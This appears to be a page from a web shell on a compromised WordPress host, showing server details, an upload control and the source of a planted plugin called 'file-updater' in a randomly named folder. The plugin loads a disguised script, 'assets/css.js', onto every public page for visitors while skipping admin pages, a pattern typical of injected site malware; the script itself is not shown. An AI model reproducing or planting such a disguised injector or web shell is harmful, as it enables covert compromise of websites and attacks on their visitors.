HEX
Server: Apache
System: Linux p3plzcpnl476737.prod.phx3.secureserver.net 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User: p8pyefaexf70 (9161224)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: //home/p8pyefaexf70/public_html/wp-content/plugins/analytics-1772876565/file-updater-7b52e912.php
<?php
/**
 * Plugin Name: file-updater
 * Description: Loads the embedded script on all frontend pages.
 * Version: 1.0.0
 */

if (!defined('ABSPATH')) { exit; }

function wp_7b52e912_enqueue() {
    if (is_admin()) { return; }
    $handle = 'h_7b52e912';
    $src = plugins_url('assets/css.js', __FILE__);
    wp_enqueue_script($handle, $src, [], null, true);
}
add_action('wp_enqueue_scripts', 'wp_7b52e912_enqueue');

function wp_7b52e912_defer_attr($tag, $handle, $src) {
    if ($handle !== 'h_7b52e912') { return $tag; }
    if (strpos($tag, ' defer') !== false) { return $tag; }
    return str_replace(' src=', ' defer src=', $tag);
}
add_filter('script_loader_tag', 'wp_7b52e912_defer_attr', 10, 3);